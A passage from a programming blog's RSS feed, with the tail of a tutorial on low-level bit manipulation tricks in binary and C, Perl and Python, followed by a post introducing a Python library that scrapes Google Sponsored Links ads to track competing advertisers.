<p>Now if we AND &#8216;x&#8217; with 1 shifted n positions to the left we effectively eliminate all the bits but n-th bit in &#8216;x&#8217;. If the result after AND-ing is 0, then that bit must have been 0, otherwise that bit was set.</p>
<p>Let&#8217;s look at some examples.</p>
<p>Does 122 have 3rd bit set? The operation we do to find it out is:</p>
<pre>
122 &#038; (1<<3)
</pre>
<p>Now, 122 is 01111010 in binary. And (1<<3) is 00001000.</p>
<pre>
    01111010
&#038;   00001000
    --------
    00001000
</pre>
<p>We see that the result is not 0, so yes, 122 has the 3rd bit set.</p>
<p><strong>Note</strong>: In my article bit numeration starts with 0. So it&#8217;s 0th bit, 1st bit, &#8230;, 7th bit.</p>
<p>What about -33? Does it have the 5th bit set?</p>
<pre>
    11011111      (-33 in binary)
&#038;   00100000     (1<<5)
    --------
    00000000
</pre>
<p>Result is 0, so the 5th bit is not set.</p>
<p><strong><a name="bithack3">Bit Hack #3. Set the n-th bit.</a></strong></p>
<pre>
y = x | (1&lt;&lt;n)
</pre>
<p>This bit hack combines the same (1&lt;&lt;n) trick of setting n-th bit by shifting with OR operation. The result of OR-ing a variable with a value that has n-th bit set is turning that n-th bit on. It&#8217;s because OR-ing any value with 0 leaves the value the same; but OR-ing it with 1 changes it to 1 (if it wasn&#8217;t already). Let&#8217;s see how that works in action:</p>
<p>Suppose we have value 120, and we wish to turn on the 2nd bit.</p>
<pre>
    01111000    (120 in binary)
|   00000100    (1<<2)
    --------
    01111100
</pre>
<p>What about -120 and 6th bit?</p>
<pre>
    10001000   (-120 in binary)
|   01000000   (1<<6)
    --------
    11001000
</pre>
<p><strong><a name="bithack4">Bit Hack #4. Unset the n-th bit.</a></strong></p>
<pre>
y = x &#038; ~(1&lt;&lt;n)
</pre>
<p>The important part of this bithack is the ~(1&lt;&lt;n) trick. It turns on all the bits except n-th.</p>
<p>Here is how it looks:</p>
<pre>
~1        11111110  (same as ~(1<<0))
~(1<<1)   11111101
~(1<<2)   11111011
~(1<<3)   11110111
~(1<<4)   11101111
~(1<<5)   11011111
~(1<<6)   10111111
~(1<<7)   01111111
</pre>
<p>The effect of AND-ing variable &#8216;x&#8217; with this quantity is eliminating n-th bit. It does not matter if the n-th bit was 0 or 1, AND-ing it with 0 sets it to 0.</p>
<p>Here is an example. Let&#8217;s unset 4th bit in 127:</p>
<pre>
    01111111    (127 in binary)
&#038;   11101111    (~(1<<4))
    --------
    01101111
</pre>
<p><strong><a name="bithack5">Bit Hack #5. Toggle the n-th bit.</a></strong></p>
<pre>
y = x ^ (1&lt;&lt;n)
</pre>
<p>This bit hack also uses the wonderful &#8220;set n-th bit shift hack&#8221; but this time it XOR&#8217;s it with the variable &#8216;x&#8217;. The result of XOR-ing something with something else is that if both bits are the same, the result is 0, otherwise it&#8217;s 1. How does it toggle n-th bit? Well, if n-th bit was 1, then XOR-ing it with 1 changes it to 0; conversely, if it was 0, then XOR-ing with with 1 changes it to 1. See, the bit got flipped.</p>
<p>Here is an example. Suppose you want to toggle 5th bit in value 01110101:</p>
<pre>
    01110101
^   00100000
    --------
    01010101
</pre>
<p>What about the same value but 5th bit originally 0?</p>
<pre>
    01010101
^   00100000
    --------
    01110101
</pre>
<p>Notice something? XOR-ing the same bit twice returned it to the same value. This nifty XOR property is used in calculating parity in RAID arrays and used in simple cryptography cyphers, but more about that in some other article.</p>
<p><strong><a name="bithack6">Bit Hack #6. Turn off the rightmost 1-bit.</a></strong></p>
<pre>
y = x &#038; (x-1)
</pre>
<p>Now it finally gets more interesting!!! Bit hacks #1 - #5 were kind of boring to be honest.</p>
<p>This bit hack turns off the rightmost one-bit. For example, given an integer 001010<strong>1</strong>0 (the rightmost 1-bit in bold) it turns it into 00101000. Or given 00010000 it turns it into 0, as there is just a single 1-bit.</p>
<p>Here are more examples:</p>
<pre>
    01010111    (x)
&#038;   01010110    (x-1)
    --------
    01010110

    01011000    (x)
&#038;   01010111    (x-1)
    --------
    01010000

    10000000    (x = -128)
&#038;   01111111    (x-1 = 127 (with overflow))
    --------
    00000000

    11111111    (x = all bits 1)
&#038;   11111110    (x-1)
    --------
    11111110

    00000000    (x = no rightmost 1-bits)
&#038;   11111111    (x-1)
    --------
    00000000
</pre>
<p>Why does it work?</p>
<p>If you look at the examples and think for a while, you&#8217;ll realize that there are two possible scenarios:</p>
<p>1. The value has the rightmost 1 bit. In this case subtracting one from it sets all the lower bits to one and changes that rightmost bit to 0 (so that if you add one now, you get the original value back). This step has masked out the rightmost 1-bit and now AND-ing it with the original value zeroes that rightmost 1-bit out.</p>
<p>2. The value has no rightmost 1 bit (all 0). In this case subtracting one underflows the value (as it&#8217;s signed) and sets all bits to 1. AND-ing all zeroes with all ones produces 0.</p>
<p><strong><a name="bithack7">Bit Hack #7. Isolate the rightmost 1-bit.</a></strong></p>
<pre>
y = x &#038; (-x)
</pre>
<p>This bit hack finds the rightmost 1-bit and sets all the other bits to 0. The end result has only that one rightmost 1-bit set. For example, 01010<strong>1</strong>00 (rightmost bit in bold) gets turned into 00000100.</p>
<p>Here are some more examples:</p>
<pre>
    10111100  (x)
&#038;   01000100  (-x)
    --------
    00000100

    01110000  (x)
&#038;   10010000  (-x)
    --------
    00010000

    00000001  (x)
&#038;   11111111  (-x)
    --------
    00000001

    10000000  (x = -128)
&#038;   10000000  (-x = -128)
    --------
    10000000

    11111111  (x = all bits one)
&#038;   00000001  (-x)
    --------
    00000001

    00000000  (x = all bits 0, no rightmost 1-bit)
&#038;   00000000  (-x)
    --------
    00000000
</pre>
<p>This bit hack works because of two&#8217;s complement. In two&#8217;s complement system -x is the same as ~x+1. Now let&#8217;s examine the two possible cases:</p>
<p>1. There is a rightmost 1-bit b<sub>i</sub>. In this case let&#8217;s pivot on this bit and divide all other bits into two flanks - bits to the right and bits to the left. Remember that all the bits to the right b<sub>i-1</sub>, b<sub>i-2</sub> &#8230; b<sub>0</sub> are 0&#8217;s (because b<sub>i</sub> was the rightmost 1-bit). And bits to the left are the way they are. Let&#8217;s call them b<sub>i+1</sub>, &#8230;, b<sub>n</sub>.</p>
<p>Now, when we calculate -x, we first do ~x which turns bit b<sub>i</sub> into 0, bits b<sub>i-1</sub> &#8230; b<sub>0</sub> into 1s, and inverts bits b<sub>i+1</sub>, &#8230;, b<sub>n</sub>, and then we add 1 to this result. </p>
<p>Since bits b<sub>i-1</sub> &#8230; b<sub>0</sub> are all 1&#8217;s, adding one makes them carry this one all the way to bit b<sub>i</sub>, which is the first zero bit.</p>
<p>If we put it all together, the result of calculating -x is that bits b<sub>i+1</sub>, &#8230;, b<sub>n</sub> get inverted, bit b<sub>i</sub> stays the same, and bits b<sub>i-1</sub>, &#8230;, b<sub>0</sub> are all 0&#8217;s.</p>
<p>Now, AND-ing x with -x makes bits b<sub>i+1</sub>, &#8230;, b<sub>n</sub> all 0, leaves bit b<sub>i</sub> as is, and sets bits b<sub>i-1</sub>, &#8230;, b<sub>0</sub> to 0. Only one bit is left, it&#8217;s the bit b<sub>i</sub> - the rightmost 1-bit.</p>
<p>2. There is no rightmost 1-bit. The value is 0. The negative of 0 in two&#8217;s complement is also 0. 0<font face="arial">&#038;</font>0 = 0. No bits get turned on.</p>
<p>We have proved rigorously that this bithack is correct.</p>
<p><strong><a name="bithack8">Bit Hack #8. Right propagate the rightmost 1-bit.</a></strong></p>
<pre>
y = x | (x-1)
</pre>
<p>This is best understood by an example. Given a value 01010000 it turns it into 01011111. All the 0-bits right to the rightmost 1-bit got turned into ones.</p>
<p>This is not a clean hack, tho, as it produces all 1&#8217;s if x = 0.</p>
<p>Let&#8217;s look at more examples:</p>
<pre>
    10111100  (x)
|   10111011  (x-1)
    --------
    10111111

    01110111  (x)
|   01110110  (x-1)
    --------
    01110111

    00000001  (x)
|   00000000  (x-1)
    --------
    00000001

    10000000  (x = -128)
|   01111111  (x-1 = 127)
    --------
    11111111

    11111111  (x = -1)
|   11111110  (x-1 = -2)
    --------
    11111111

    00000000  (x)
|   11111111  (x-1)
    --------
    11111111
</pre>
<p>Let&#8217;s prove it, though not as rigorously as in the previous bithack (as it&#8217;s too time consuming and this is not a scientific publication). There are two cases again. Let&#8217;s start with easiest first.</p>
<p>1. There is no rightmost 1-bit. In that case x = 0 and x-1 is -1. -1 in two&#8217;s complement is 11111111. OR-ing 0 with 11111111 produces the same 11111111. (Not the desired result, but that&#8217;s the way it is.)</p>
<p>2. There is the rightmost 1-bit b<sub>i</sub>. Let&#8217;s divide all the bits in two groups again (like in the previous example). Calculating x-1 modifies only bits to the right, turning b<sub>i</sub> into 0, and all the lower bits to 1&#8217;s. Now OR-ing x with x-1 leaves all the higher bits (to the left) the same, leaves bit b<sub>i</sub> as it was 1, and since lower bits are all low 1&#8217;s it also turns them on. The result is that the rightmost 1-bit got propagated to lower order bits.</p>
<p><strong><a name="bithack9">Bit Hack #9. Isolate the rightmost 0-bit.</a></strong></p>
<pre>
y = ~x &#038; (x+1)
</pre>
<p>This bithack does the opposite of #7. It finds the rightmost 0-bit, turns off all bits, and sets this bit to 1 in the result. For example, it finds the zero in bold in this number 10101<strong>0</strong>11, producing 00000100.</p>
<p>More examples:</p>
<pre>
    10111100  (x)
    --------
    01000011  (~x)
&#038;   10111101  (x+1)
    --------
    00000001

    01110111  (x)
    --------
    10001000  (~x)
&#038;   01111000  (x+1)
    --------
    00001000

    00000001  (x)
    --------
    11111110  (~x)
&#038;   00000010  (x+1)
    --------
    00000010

    10000000  (x = -128)
    --------
    01111111  (~x)
&#038;   10000001  (x+1)
    --------
    00000001

    11111111  (x = no rightmost 0-bit)
    --------
    00000000  (~x)
&#038;   00000000  (x+1)
    --------
    00000000

    00000000  (x)
    --------
    11111111  (~x)
&#038;   00000001  (x+1)
    --------
    00000001
</pre>
<p>Proof: Suppose there is a rightmost 0-bit. Then ~x turns this rightmost 0 bit into 1 bit. And so does x+1 (because bits more right to the rightmost 0 bit are 1&#8217;s). Now AND-ing ~x with x+1 evaporates all the bits up to this rightmost 0 bit. This is the highest order bit set in the result. Now what about lower order bits to the right of rightmost 0 bit? They also got evaporated because because x+1 turned them into 0&#8217;s (they were 1&#8217;s) and ~x turned them into 0&#8217;s. They got AND-ed with 0 and evaporated.</p>
<p><strong><a name="bithack10">Bit Hack #10. Turn on the rightmost 0-bit.</a></strong></p>
<pre>
y = x | (x+1)
</pre>
<p>This hack changes the rightmost 0-bit into 1. For example, given an integer 10100011 it turns it into 10100111.</p>
<p>More examples:</p>
<pre>
    10111100  (x)
|   10111101  (x+1)
    --------
    10111101

    01110111  (x)
|   01111000  (x+1)
    --------
    01111111

    00000001  (x)
|   00000010  (x+1)
    --------
    00000011

    10000000  (x = -128)
|   10000001  (x+1)
    --------
    10000001

    11111111  (x = no rightmost 0-bit)
|   00000000  (x+1)
    --------
    11111111

    00000000  (x)
|   00000001  (x+1)
    --------
    00000001
</pre>
<p>Here is the proof as a bunch of true statements. OR-ing x with x+1 does not lose any information. Adding 1 to x fills the first rightmost 0. The result is max{x, x+1}. If x+1 overflows it&#8217;s x and there were no 0 bits. If it doesn&#8217;t, it&#8217;s x+1 which just got rightmost bit filled with 1.</p>
<h2 style="margin-bottom:10px">Bonus stuff.</h2>
<p>If you decide to play more with these hacks, here are a few utility functions to print binary values of <strong>8 bit signed integers</strong> in Perl, Python and C.</p>
<p>Print binary representation in Perl:</p>
<pre>
sub int_to_bin {
  my $num = shift;
  print unpack "B8", pack "c", $num;
}
</pre>
<p>Or you can print it from command line right away:</p>
<pre>
perl -wle 'print unpack "B8", pack "c", shift' <integer>

# For example:
perl -wle &#39;print unpack &#34;B8&#34;, pack &#34;c&#34;, shift&#39; 113
01110001

perl -wle &#39;print unpack &#34;B8&#34;, pack &#34;c&#34;, shift&#39; &#45;&#45; -128
10000000
</pre>
<p>Print binary number in Python:</p>
<pre>
def int_to_bin(num, bits=8):
 r = ''
 while bits:
  r = ('1' if num&#038;1 else '0') + r
  bits = bits - 1
  num = num >> 1
 print r
</pre>
<p>Print binary representation in C:</p>
<pre>
void int_to_bin(int num) {
  char str[9] = {0};
  int i;
  for (i=7; i>=0; i--) {
    str[i] = (num&#038;1)?'1':'0';
    num >>= 1;
  }
  printf("%s\n", str);
}
</pre>
<p>Have fun with these! I&#8217;ll write about advanced bit hacks some time soon. If you are really intrigued by this topic I encourage you to <a href="http://www.catonmat.net/feed/">subscribe to my blog</a>. Thanks! <img src='http://www.catonmat.net/blog/wp-includes/images/smilies/icon_smile.gif' alt=':)' class='wp-smiley' /> </p>
<p>Ps. Let me know in the comments what you think about this article, and let me know if you do not know what two&#8217;s complement, or the basic binary operations are. If there are a few people who would like me to explain these concepts, I&#8217;ll be glad to write another article just about these fundamental topics.</p>
<p>Pps. There is a book entirely on bit hacks like these. It&#8217;s called &#8220;<a href="http://www.amazon.com/gp/product/0201914654?ie=UTF8&#038;tag=catonmat-20&#038;linkCode=as2&#038;camp=1789&#038;creative=9325&#038;creativeASIN=0201914654">Hacker&#8217;s Delight</a>&#8220;. It may be worth getting if you are into this stuff:</p>
<div class="center-aligner">
<iframe src="http://rcm.amazon.com/e/cm?t=catonmat-20&#038;o=1&#038;p=8&#038;l=as1&#038;asins=0201914654&#038;fc1=000000&#038;IS2=1&#038;lt1=_blank&#038;m=amazon&#038;lc1=0000FF&#038;bc1=000000&#038;bg1=FFFFFF&#038;f=ifr" style="width:120px;height:240px;" scrolling="no" marginwidth="0" marginheight="0" frameborder="0"></iframe>
</div>
<div class="feedflare">
<a href="http://feeds.feedburner.com/~ff/catonmat?a=sM02mGRP-r0:_is63ptlvAU:yIl2AUoC8zA"><img src="http://feeds.feedburner.com/~ff/catonmat?d=yIl2AUoC8zA" border="0"></img></a> <a href="http://feeds.feedburner.com/~ff/catonmat?a=sM02mGRP-r0:_is63ptlvAU:F7zBnMyn0Lo"><img src="http://feeds.feedburner.com/~ff/catonmat?i=sM02mGRP-r0:_is63ptlvAU:F7zBnMyn0Lo" border="0"></img></a> <a href="http://feeds.feedburner.com/~ff/catonmat?a=sM02mGRP-r0:_is63ptlvAU:V_sGLiPBpWU"><img src="http://feeds.feedburner.com/~ff/catonmat?i=sM02mGRP-r0:_is63ptlvAU:V_sGLiPBpWU" border="0"></img></a> <a href="http://feeds.feedburner.com/~ff/catonmat?a=sM02mGRP-r0:_is63ptlvAU:gIN9vFwOqvQ"><img src="http://feeds.feedburner.com/~ff/catonmat?i=sM02mGRP-r0:_is63ptlvAU:gIN9vFwOqvQ" border="0"></img></a>
</div><img src="http://feeds.feedburner.com/~r/catonmat/~4/sM02mGRP-r0" height="1" width="1"/>]]></content:encoded>
			<wfw:commentRss>http://www.catonmat.net/blog/low-level-bit-hacks-you-absolutely-must-know/feed/</wfw:commentRss>
		<feedburner:origLink>http://www.catonmat.net/blog/low-level-bit-hacks-you-absolutely-must-know/</feedburner:origLink></item>
		<item>
		<title>Python Library for Searching Adwords</title>
		<link>http://feedproxy.google.com/~r/catonmat/~3/Gq_P2xFmDK8/</link>
		<comments>http://www.catonmat.net/blog/python-library-for-google-sponsored-links-search/#comments</comments>
		<pubDate>Wed, 15 Apr 2009 05:35:05 +0000</pubDate>
		<dc:creator>Peteris Krumins</dc:creator>
		
		<category><![CDATA[Programming]]></category>
<category>adwords</category><category>google</category><category>google search</category><category>python</category><category>search</category><category>sponsored links</category><category>xgoogle</category>
		<guid isPermaLink="false">http://www.catonmat.net/blog/python-library-for-google-sponsored-links-search/</guid>
		<description><![CDATA[Here is another quick hack that I wrote a while ago. It complements the xgoogle library that I published in my previous post with an API for Google Sponsored Links search.
Let me quickly explain why this library is useful, and what the Google Sponsored Links are.
For a typical search, Google shows regular web search results [...]]]></description>
			<content:encoded><![CDATA[<p><img src='http://www.catonmat.net/blog/wp-content/uploads/2009/03/google-python-search-library.jpg' alt='Google Python Search Library' class='post-icon' align='left' />Here is another quick hack that I wrote a while ago. It complements the <a href="http://www.catonmat.net/blog/python-library-for-google-search/">xgoogle library</a> that I published in my previous post with an API for <a href="http://www.google.com/sponsoredlinks">Google Sponsored Links</a> search.</p>
<p>Let me quickly explain why this library is useful, and what the Google Sponsored Links are.</p>
<p>For a typical search, Google shows regular web search results on the left side of the page, and &#8220;Sponsored Links&#8221; in a column on the right side. &#8220;Sponsored&#8221; means the results are pulled from Googe&#8217;s advertising network (<a href="https://adwords.google.com">Adwords</a>).</p>
<p>Here is a screenshot that illustrates the Sponsored Links:</p>
<div class="center-aligner">
<img src='http://www.catonmat.net/blog/wp-content/uploads/2009/04/google-sponsored-links.jpg' alt='Google Sponsored Links' /><br />
<small>Google Sponsored Links results for search term &#8220;security&#8221; are <font color="red">in red</font>.</small>
</div>
<p>Okay, now why would I need a library to search the Sponsored results? Suppose that I am an advertiser on Adwords, and I buy some software related keywords like &#8220;video software&#8221;. It is in my interests to know my competitors, their advertisement text, what are they up to, the new players in this niche, and their websites. Without my library it would be practically impossible to keep track of all the competitors. There can literally be hundreds of changes per day. However, with my library it&#8217;s now piece of cake to keep track of all the dynamics.</p>
<h2 style="margin-bottom:10px">How does the library work?</h2>
<p>The sponsored links library pulls the results from this URL: <a href="http://www.google.com/sponsoredlinks">http://www.google.com/sponsoredlinks</a>. Here is an example of all the sponsored results for a query &#8220;security&#8221;:</p>
<div class="center-aligner">
<a href='http://www.catonmat.net/blog/wp-content/uploads/2009/04/sponsored-links-security-full.jpg' title='Google Sponsored Links for Security Full'><img src='http://www.catonmat.net/blog/wp-content/uploads/2009/04/sponsored-links-security.jpg' alt='Google Sponsored Links for Security' /></a><br />
<small>Sponsored links results for &#8220;security&#8221;.</small>
</div>
<p>The library just grabs page after page, calls <a href="http://www.crummy.com/software/BeautifulSoup/">BeautifulSoup</a>, and extracts the search result elements. Elementary.</p>
<h2 style="margin-bottom:10px">How to use the library?</h2>
<p>As I mentioned, this library is part of my <a href="http://www.catonmat.net/blog/python-library-for-google-search/">xgoogle library</a>. Download and extract it first:</p>
<p>Download: <a href="http://www.catonmat.net/download/xgoogle.zip" title="Version 1.3 downloaded 2788 times" rel="enclosure">xgoogle library (.zip)</a><br />
Downloaded: 2788 times.<br />
Download url: http://www.catonmat.net/download/xgoogle.zip</p>
<p>Now, the source file that contains the implementation of this library is &#8220;xgoogle/sponsoredlinks.py&#8221;. To use it, do the usual import &#8220;from xgoogle.sponsoredlinks import SponsoredLinks, SLError&#8221;.</p>
<p><strong>SponsoredLinks</strong> is the class that provides the API and <strong>SLError</strong> is exception class that gets thrown in case of errors, so it&#8217;s a good idea to import both.</p>
<p>The SponsoredLinks has a similar interface as the <a href="http://www.catonmat.net/blog/python-library-for-google-search/">xgoogle.search</a> (the plain google search module). The constructor of SponsoredLinks takes the keyword you want to search for, and the constructed object has several public methods and properties:</p>
<ul>
<li><strong>method get_results()</strong> - gets a page of results, returning a list of SponsoredLink objects. It returns an empty list if there are no more results.</li>
<li><strong>property num_results</strong> - returns number of search results found.</li>
<li><strong>property results_per_page</strong> - sets/gets the number of results to get per page (max 100).</li>
</ul>
<p>The returned SponsoredLink objects have four attributes &#8212; &#8220;title&#8221;, &#8220;desc&#8221;, &#8220;url&#8221;, and &#8220;display_url&#8221;. Here is a picture that illustrates what each attribute stands for:</p>
<div class="center-aligner">
<img src='http://www.catonmat.net/blog/wp-content/uploads/2009/04/sponsored-link-api.jpg' alt='Coresspondence between sponsored link and result object' />
</div>
<p>The picture does not show the &#8220;display_url&#8221; attribute as it&#8217;s the actual link the result links to (href of blue link in the pic).</p>
<p>Here is an example usage of this library. It retrieves first 100 Sponsored Links results for keyword &#8220;video software&#8221;:</p>
<pre>
from xgoogle.sponsoredlinks import SponsoredLinks, SLError
try:
  sl = SponsoredLinks("video software")
  sl.results_per_page = 100
  results = sl.get_results()
except SLError, e:
  print "Search failed: %s" % e

for result in results:
  print result.title.encode('utf8')
  print result.desc.encode('utf8')
  print result.display_url.encode('utf8')
  print result.url.encode('utf8')
  print
</pre>
<p>Output:</p>
<pre>
Photoshop Video Software
Time saving software for video. Work faster in Photoshop.
www.toolsfortelevision.com
http://www.toolsfortelevision.com

...
</pre>
<p>That&#8217;s about it for this time. Use it to find your competitors and outsmart them!</p>
<p>Next time I am going to expand the library for <a href="http://labs.google.com/sets">Google Sets</a> search.</p>
<div class="download">
<div class="download-title">Download &#8220;<strong>xgoogle</strong>&#8221; library:</div>
<p>Download: <a href="http://www.catonmat.net/download/xgoogle.zip" title="Version 1.3 downloaded 2788 times" rel="enclosure">xgoogle library (.zip)</a><br />
Downloaded: 2788 times.<br />
Download url: http://www.catonmat.net/download/xgoogle.zip</p>
</div>
<p>Have fun!</p>
<div class="feedflare">
<a href="http://feeds.feedburner.com/~ff/catonmat?a=Gq_P2xFmDK8:034Ns6oXCTI:yIl2AUoC8zA"><img src="http://feeds.feedburner.com/~ff/catonmat?d=yIl2AUoC8zA" border="0"></img></a> <a href="http://feeds.feedburner.com/~ff/catonmat?a=Gq_P2xFmDK8:034Ns6oXCTI:F7zBnMyn0Lo"><img src="http://feeds.feedburner.com/~ff/catonmat?i=Gq_P2xFmDK8:034Ns6oXCTI:F7zBnMyn0Lo" border="0"></img></a> <a href="http://feeds.feedburner.com/~ff/catonmat?a=Gq_P2xFmDK8:034Ns6oXCTI:V_sGLiPBpWU"><img src="http://feeds.feedburner.com/~ff/catonmat?i=Gq_P2xFmDK8:034Ns6oXCTI:V_sGLiPBpWU" border="0"></img></a> <a href="http://feeds.feedburner.com/~ff/catonmat?a=Gq_P2xFmDK8:034Ns6oXCTI:gIN9vFwOqvQ"><img src="http://feeds.feedburner.com/~ff/catonmat?i=Gq_P2xFmDK8:034Ns6oXCTI:gIN9vFwOqvQ" border="0"></img></a>
</div><img src="http://feeds.feedburner.com/~r/catonmat/~4/Gq_P2xFmDK8" height="1" width="1"/>]]></content:encoded>
			<wfw:commentRss>http://www.catonmat.net/blog/python-library-for-google-sponsored-links-search/feed/</wfw:commentRss>
		<feedburner:origLink>http://www.catonmat.net/blog/python-library-for-google-sponsored-links-search/</feedburner:origLink></item>
	</channel>
</rss>
